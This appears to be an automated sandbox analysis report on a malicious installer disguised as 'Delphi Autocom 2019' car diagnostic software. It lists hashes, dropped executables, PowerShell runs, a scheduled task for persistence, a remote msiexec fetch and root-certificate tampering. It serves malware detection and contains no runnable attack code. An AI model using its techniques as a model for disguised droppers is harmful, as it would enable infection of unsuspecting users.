aef0a3047c1d28f5ea9c64a530e1183c507f62e8878b51d8b0ac043fafb87df1

Resubmissions

25/05/2024, 17:51

240525-wfdqjscd71 8

25/05/2024, 17:46

240525-wcqwpscc7t 8

Analysis

max time kernel
149s
max time network
146s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
25/05/2024, 17:51

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Delphi ( Autocom) 2019.0 Cars.exe
Size

10.8MB
MD5

16866b9762000c4e57787911a2aada98
SHA1

f3d873cbaa765e215fd6a70127ac8afaee198088
SHA256

aef0a3047c1d28f5ea9c64a530e1183c507f62e8878b51d8b0ac043fafb87df1
SHA512

39180033859304b006a11b6aa65e5e3a35772056ca6c47b77ad4ba34c02e02791b4d590e6bba35cdac173fe6db7c59d0790b9dc0b46446b59d4d76391b545dea
SSDEEP

196608:ueU4ys2IbPyZ3VhHX5sbNjE5GqpUvQEleKQGIPeU8sPdHkpr+BDRJTImW:ueUBtIbPyZFhHXmbNh0UvnQ7xHkQBDRO

Score

8^/10

execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 9 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2032	powershell.exe
908	powershell.exe
1592	powershell.exe
3024	powershell.exe
2896	powershell.exe
2720	powershell.exe
2660	powershell.exe
2968	powershell.exe
1488	powershell.exe

Downloads MZ/PE file

Executes dropped EXE 4 IoCs

pid	Process
1252	mot.exe
1312	set_2.exe
2348	set_2.tmp
1308	set_3.exe

Loads dropped DLL 57 IoCs

pid	Process
2128	Delphi ( Autocom) 2019.0 Cars.exe
2128	Delphi ( Autocom) 2019.0 Cars.exe
2128	Delphi ( Autocom) 2019.0 Cars.exe
2128	Delphi ( Autocom) 2019.0 Cars.exe
2128	Delphi ( Autocom) 2019.0 Cars.exe
1252	mot.exe
1252	mot.exe
1252	mot.exe
1252	mot.exe
1252	mot.exe
1252	mot.exe
1252	mot.exe
1252	mot.exe
1252	mot.exe
1252	mot.exe
1312	set_2.exe
1312	set_2.exe
1312	set_2.exe
2840	MsiExec.exe
2980	MsiExec.exe
2980	MsiExec.exe
2980	MsiExec.exe
2980	MsiExec.exe
836	MsiExec.exe
836	MsiExec.exe
1128	msiexec.exe
836	MsiExec.exe
2840	MsiExec.exe
1252	mot.exe
1252	mot.exe
1252	mot.exe
1308	set_3.exe
1308	set_3.exe
1308	set_3.exe
1308	set_3.exe
1308	set_3.exe
2284	MsiExec.exe
2284	MsiExec.exe
816	MsiExec.exe
816	MsiExec.exe
816	MsiExec.exe
816	MsiExec.exe
816	MsiExec.exe
816	MsiExec.exe
816	MsiExec.exe
816	MsiExec.exe
816	MsiExec.exe
1308	set_3.exe
816	MsiExec.exe
816	MsiExec.exe
816	MsiExec.exe
1652	MsiExec.exe
816	MsiExec.exe
1252	mot.exe
1184	Process not Found
1184	Process not Found
1184	Process not Found

Unknown use of msiexec with remote resource 1 IoCs

pid	Process
1680	msiexec.exe

Blocklisted process makes network request 7 IoCs

flow	pid	Process
45	1128	msiexec.exe
46	1128	msiexec.exe
48	1128	msiexec.exe
50	1128	msiexec.exe
59	816	MsiExec.exe
61	816	MsiExec.exe
62	816	MsiExec.exe

Enumerates connected drives 3 TTPs 46 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\J:	set_3.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\G:	set_3.exe
File opened (read-only)	\??\Y:	set_3.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\E:	set_3.exe
File opened (read-only)	\??\K:	set_3.exe
File opened (read-only)	\??\A:	set_3.exe
File opened (read-only)	\??\H:	set_3.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\L:	set_3.exe
File opened (read-only)	\??\M:	set_3.exe
File opened (read-only)	\??\S:	set_3.exe
File opened (read-only)	\??\W:	set_3.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\P:	set_3.exe
File opened (read-only)	\??\U:	set_3.exe
File opened (read-only)	\??\B:	set_3.exe
File opened (read-only)	\??\I:	set_3.exe
File opened (read-only)	\??\Q:	set_3.exe
File opened (read-only)	\??\R:	set_3.exe
File opened (read-only)	\??\V:	set_3.exe
File opened (read-only)	\??\Z:	set_3.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\O:	set_3.exe
File opened (read-only)	\??\T:	set_3.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\N:	set_3.exe
File opened (read-only)	\??\X:	set_3.exe

Drops file in System32 directory 9 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\worker-farm\tests\child.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\lib\utils\is-windows-shell.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\getpass\.npmignore	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\node-gyp\lib\node-gyp.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\man\man1\npm-deprecate.1	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\tiny-relative-date\translations\en.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\concat-stream\node_modules\readable-stream\GOVERNANCE.md	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\lodash._createset\package.json	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\signal-exit\package.json	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\libnpm\link-bin.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\docs\content\cli-commands\npm-hook.md	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\jsbn\example.html	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\normalize-package-data\lib\fixer.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\xdg-basedir\package.json	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\normalize-package-data\node_modules\resolve\changelog.hbs	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\stream-iterate\node_modules\readable-stream\lib\_stream_passthrough.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\tweetnacl\nacl.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\find-up\index.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\docs\public\cli-commands\npm-init\index.html	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\libnpmpublish\PULL_REQUEST_TEMPLATE	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\cliui\README.md	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\lockfile\CHANGELOG.md	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\lib\auth\sso.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\combined-stream\License	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\es-abstract\operations\2016.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\through2\node_modules\readable-stream\writable.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\lib\doctor\get-latest-nodejs-version.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\are-we-there-yet\LICENSE	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\docs\public\cli-commands\npm-dedupe\index.html	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\ajv\lib\dotjs\contains.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\pacote\extract.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\docs\content\cli-commands\npm-install-ci-test.md	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\qs\LICENSE	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\npm-registry-fetch\index.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\cidr-regex\package.json	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\docs\content\cli-commands\npm-bin.md	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\pumpify\LICENSE	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\strip-eof\index.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\graceful-fs\LICENSE	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\jsprim\CHANGES.md	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\http-cache-semantics\package.json	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\object-keys\.editorconfig	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\agent-base\index.d.ts	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\unique-filename\coverage\__root__\index.html	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\npm-registry-fetch\node_modules\safe-buffer\README.md	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\umask\ChangeLog	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\qrcode-terminal\bin\qrcode-terminal.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\lib\config\load-prefix.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\node-gyp\LICENSE	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\fs-minipass\node_modules\minipass\package.json	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\fast-json-stable-stringify\.npmignore	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\docs\content\cli-commands\npm-version.md	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\errno\errno.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\docs\public\cli-commands\npm-link\index.html	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\supports-color\index.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\qrcode-terminal\vendor\QRCode\QRPolynomial.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\unique-slug\package.json	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\har-validator\README.md	msiexec.exe
File opened for modification	C:\Program Files\nodejs\node_etw_provider.man	MsiExec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\through\.travis.yml	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\prr\.npmignore	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\flush-write-stream\node_modules\readable-stream\lib\internal\streams\destroy.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\node-gyp\lib\process-release.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\osenv\osenv.js	msiexec.exe

Drops file in Windows directory 41 IoCs

description	ioc	Process
File created	C:\Windows\Installer\f779fdc.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\SystemFoldermsiexec.exe	msiexec.exe
File created	C:\Windows\Installer\f779fe2.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIA701.tmp	msiexec.exe
File created	C:\Windows\Installer\{D6640E00-FA29-47B7-99A3-3A63DC0A5D0E}\NodeIcon	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIAEFF.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI505.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI63F.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIA6A3.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI7D9.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\{D6640E00-FA29-47B7-99A3-3A63DC0A5D0E}\NodeIcon	msiexec.exe
File created	C:\Windows\Installer\f779fe0.ipi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSID8DF.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIDA57.tmp	msiexec.exe
File created	C:\Windows\Installer\f779fdd.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI67E.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI70C.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\logo.exe	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIAECF.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSID833.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIA4CE.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI4B4.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI525.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI73C.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI897.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\f779fe0.ipi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI8C83.tmp	msiexec.exe
File created	C:\Windows\Installer\f779fda.ipi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI4E4.tmp	msiexec.exe
File created	C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\SystemFoldermsiexec.exe	msiexec.exe
File opened for modification	C:\Windows\Installer\f779fdd.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI3C9.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI7EA.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIDBDF.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI4C4.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI6AE.tmp	msiexec.exe
File created	C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\logo.exe	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI9D1.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI9F8F.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\f779fda.ipi	msiexec.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

NSIS installer 2 IoCs

installer

resource	yara_rule
behavioral1/files/0x0006000000015f6d-110.dat	nsis_installer_1
behavioral1/files/0x0006000000015f6d-110.dat	nsis_installer_2

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
640	schtasks.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
2848	taskkill.exe

Modifies data under HKEY_USERS 6 IoCs

description	ioc	Process
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2E	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad	msiexec.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2E	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2F	msiexec.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E	msiexec.exe

Modifies registry class 54 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\Language = "1033"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\00E0466D92AF7B74993AA336CDA0D5E0\Language = "1033"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\PackageCode = "B8DDBE5C483C5BC4A933A9E42F81D915"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\Assignment = "1"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\Media	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\00E0466D92AF7B74993AA336CDA0D5E0\SourceList	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\00E0466D92AF7B74993AA336CDA0D5E0\SourceList\URL\SourceType = "2"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\Media\DiskPrompt = "[1]"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\A3A70C74FE2431248AD5F8A59570C782	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\00E0466D92AF7B74993AA336CDA0D5E0\SourceList\Media	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\00E0466D92AF7B74993AA336CDA0D5E0\DeploymentFlags = "3"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\Media\1 = ";"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\00E0466D92AF7B74993AA336CDA0D5E0\SourceList\Media\1 = ";"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Roaming\\AW Manager\\Windows Manager 1.0.0\\install\\97FDF62\\"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\00E0466D92AF7B74993AA336CDA0D5E0\SourceList\URL	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\00E0466D92AF7B74993AA336CDA0D5E0\InstanceType = "0"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\00E0466D92AF7B74993AA336CDA0D5E0\AuthorizedLUAApp = "0"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\00E0466D92AF7B74993AA336CDA0D5E0\PackageCode = "4155B504E76FF7B40BB44503BB1B4FC1"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\ProductName = "Windows Manager"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\00E0466D92AF7B74993AA336CDA0D5E0\Version = "219021312"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\00E0466D92AF7B74993AA336CDA0D5E0\ProductIcon = "C:\\Windows\\Installer\\{D6640E00-FA29-47B7-99A3-3A63DC0A5D0E}\\NodeIcon"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\00E0466D92AF7B74993AA336CDA0D5E0\SourceList\LastUsedSource = "u;1;https://nodejs.org/dist/v13.14.0/"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\C414548CC3098124D97E31A29BF7FD26	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\AdvertiseFlags = "388"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\InstanceType = "0"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\00E0466D92AF7B74993AA336CDA0D5E0\NodeEtwSupport = "NodeRuntime"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\00E0466D92AF7B74993AA336CDA0D5E0\npm	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Roaming\\AW Manager\\Windows Manager 1.0.0\\install\\97FDF62\\"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\PackageName = "Windows Manager - Postback Johan.msi"	msiexec.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\Clients = 3a0000000000	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\00E0466D92AF7B74993AA336CDA0D5E0\Assignment = "1"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\ProductIcon = "C:\\Windows\\Installer\\{C845414C-903C-4218-9DE7-132AB97FDF62}\\logo.exe"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\00E0466D92AF7B74993AA336CDA0D5E0\DocumentationShortcuts	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\Version = "16777216"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\00E0466D92AF7B74993AA336CDA0D5E0	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\00E0466D92AF7B74993AA336CDA0D5E0\AdvertiseFlags = "388"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\00E0466D92AF7B74993AA336CDA0D5E0	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\00E0466D92AF7B74993AA336CDA0D5E0\EnvironmentPathNpmModules = "EnvironmentPath"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\DeploymentFlags = "3"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\A3A70C74FE2431248AD5F8A59570C782\00E0466D92AF7B74993AA336CDA0D5E0	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\00E0466D92AF7B74993AA336CDA0D5E0\SourceList\URL\1 = "https://nodejs.org/dist/v13.14.0/"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\Net	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\00E0466D92AF7B74993AA336CDA0D5E0\EnvironmentPath	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\5785CBDF4ABB5AD409841A692AF14EA9\C414548CC3098124D97E31A29BF7FD26	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\00E0466D92AF7B74993AA336CDA0D5E0\SourceList\PackageName = "node-v13.14.0-x64.msi"	msiexec.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\00E0466D92AF7B74993AA336CDA0D5E0\Clients = 3a0000000000	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\C414548CC3098124D97E31A29BF7FD26\MainFeature	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\AuthorizedLUAApp = "0"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\00E0466D92AF7B74993AA336CDA0D5E0\EnvironmentPathNode = "EnvironmentPath"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\00E0466D92AF7B74993AA336CDA0D5E0\ProductName = "Node.js"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\00E0466D92AF7B74993AA336CDA0D5E0\NodeRuntime	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\5785CBDF4ABB5AD409841A692AF14EA9	msiexec.exe

Modifies system certificate store 2 TTPs 10 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 040000000100000010000000a923759bba49366e31c2dbf2e766ba870f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a953000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f0067006900650073000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e41d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca619000000010000001000000044ba5fd9039fc9b56fd8aadccd597ca62000000001000000eb020000308202e730820250020101300d06092a864886f70d01010505003081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d301e170d3939303632363030313935345a170d3139303632363030313935345a3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a965d449132d244d1c506fb5c185543bfe71e